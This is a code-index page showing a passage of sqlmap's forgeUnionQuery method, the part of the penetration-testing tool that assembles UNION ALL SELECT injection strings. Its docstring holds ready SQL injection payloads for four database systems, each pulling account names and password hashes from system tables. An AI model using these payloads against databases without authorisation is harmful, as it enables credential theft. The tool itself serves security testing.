MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / forgeUnionQuery

Method forgeUnionQuery

lib/core/agent.py:825–937  ·  view source on GitHub ↗

Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query. Examples: MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR

(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None)

Source from the content-addressed store, hash-verified

823 return concatenatedQuery
824
825 def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
826 """
827 Take in input an query (pseudo query) string and return its
828 processed UNION ALL SELECT query.
829
830 Examples:
831
832 MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
833 MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488
834
835 PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
836 PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713
837
838 Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
839 Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738
840
841 Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
842 Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254
843
844 @param query: it is a processed query string unescaped to be
845 forged within an UNION ALL SELECT statement
846 @type query: C{str}
847
848 @param position: it is the NULL position where it is possible
849 to inject the query
850 @type position: C{int}
851
852 @return: UNION ALL SELECT query string forged
853 @rtype: C{str}
854 """
855
856 if conf.uFrom:
857 fromTable = " FROM %s" % conf.uFrom
858 elif not fromTable:
859 if kb.tableFrom:
860 fromTable = " FROM %s" % kb.tableFrom
861 else:
862 fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")
863
864 if query.startswith("SELECT "):
865 query = query[len("SELECT "):]
866
867 unionQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)
868
869 if limited:
870 unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
871 unionQuery += fromTable
872 unionQuery = self.suffixQuery(unionQuery, comment, suffix)
873
874 return unionQuery
875 else:
876 _ = zeroDepthSearch(query, " FROM ")
877 if _:
878 fromTable = query[_[0]:]
879
880 if fromTable and query.endswith(fromTable):
881 query = query[:-len(fromTable)]
882

Callers 4

_formatInjectionFunction · 0.80
_findUnionCharCountFunction · 0.80
_unionPositionFunction · 0.80
_oneShotUnionUseFunction · 0.80

Calls 9

prefixQueryMethod · 0.95
suffixQueryMethod · 0.95
zeroDepthSearchFunction · 0.90
xrangeClass · 0.85
getIdentifiedDbmsMethod · 0.80
getMethod · 0.45
searchMethod · 0.45
indexMethod · 0.45
replaceMethod · 0.45

Tested by 2

_findUnionCharCountFunction · 0.64
_unionPositionFunction · 0.64